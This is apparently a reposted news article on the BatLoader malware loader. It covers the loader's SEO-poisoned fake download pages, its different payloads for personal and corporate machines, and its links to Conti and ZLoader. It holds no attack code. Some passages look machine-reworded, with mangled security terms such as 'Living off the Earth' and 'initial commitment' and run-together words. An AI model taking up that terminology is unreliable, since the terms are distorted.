A dangerous new malware loader with features to determine whether it is on a business system or a personal computer has started rapidly infecting systems around the world in recent months.
VMware Carbon Black researchers are tracking the threat, dubbed BatLoader, and say its operators are using the dropper to distribute a variety of malware tools, including a banking Trojan, an information-stealing and the Cobalt Strike post-exploit toolkit on victim systems. The threat actor’s tactic has been to host the malware on compromised websites and lure users to those sites using search engine optimization (SEO) poisoning methods.
Living off the Earth
BatLoader relies heavily on batch scripts and PowerShell to get a foothold on a victim machine and download other malware onto it. This is what the campaign has done difficult to detect and blockespecially in the early stages, analysts at VMware Carbon Black’s managed detection and response (MDR) team said in a report released Nov. 14.
VMware said its Carbon Black MDR team had observed 43 successful infections in the past 90 days, in addition to numerous other unsuccessful attempts where a victim downloaded the initial infection file but did not execute it. Nine of the victims were organizations in the business services sector, seven were financial services companies and five were in the manufacturing industry. Other victims include organizations in the education, retail, IT and healthcare sectors.
On November 9, eSentire said its threat hunting team had observed the BatLoader operator luring victims to websites masquerading as download pages for popular commercial software such as LogMeIn, Zoom, TeamViewer and AnyDesk . The threat actor distributed links to these websites through ads that appeared prominently in search engine results when users searched for one of these software products.
The security vendor said that in an incident in late October, an eSentire customer landed on a fake LogMeIn download page and downloaded a Windows installer that, among other things, profiles the system and it uses the information to retrieve a payload from the second stage.
“What makes BatLoader interesting is that it has built-in logic that determines whether the victim’s computer is a personal computer or a corporate computer,” says Keegan Keplinger, head of research and reporting at the investigative team. eSentire TRU. “Then it drops the right type of malware for the situation.”
Selective payload delivery
For example, if BatLoader reaches a personal computer, it downloads Ursnif banking malware and Vidar information theft. If it reaches a corporate or domain-joined computer, it downloads Cobalt Strike and the Syncro remote control and management tool, in addition to the banking trojan and information theft.
“If BatLoader lands on a personal computer, it will proceed with fraud, information theft and bank-based payloads like Ursnif,” says Keegan. “If BatLoader detects that it is in an organizational environment, it will proceed with intrusion tools such as Cobalt Strike and Syncro.”
Keegan says eSentire has seen “many” recent cyber attacks using BatLoader. Most attacks are opportunistic and affect anyone looking for popular and trusted free software tools.
“To get in front of organizations, BatLoader leverages poisoned ads so that when employees search for trusted free software, like LogMeIn and Zoom, they land on sites controlled by the attackers and offer BatLoader.”
Overlays with Conti, ZLoader
VMware Carbon Black said that while there are several aspects of the BatLoader campaign that are unique, there are also several attributes of the attack chain that bear a resemblance to the Ransomware operation Conti.
The overlaps include an IP address that the Conti group used in a campaign exploiting the Log4j vulnerability and the use of a remote management tool called Atera that Conti has used in previous operations.
In addition to the similarities to Conti, BatLoader also has several overlaps Zloader, a banking trojan which appears to be derived from the Zeus banking Trojan of the early 2000s, the security vendor said. The biggest similarities include the use of SEO poisoning to lure victims to malware-laden websites, the use of Windows Installer to establish an initial access point, and the use of PowerShell, batch scripts and other native OS binaries during the attack chain.
Mandiant was the first to report on BatLoader. In a February blog post, the security vendor reported that it observed a threat actor using the themes “free installation of productivity apps” and “installation of free software development tools” as SEO keywords to attract users to download sites.
“That initial commitment of BatLoader was the start of a chain of infection in several stages which gives attackers a foothold inside the target organization,” Mandiant said. The attackers used all stages to set up the next phase of the attack chain using tools such as PowerShell, Msiexec.exe, and Mshta.exe to evade detection.
[ad_2]
Source link
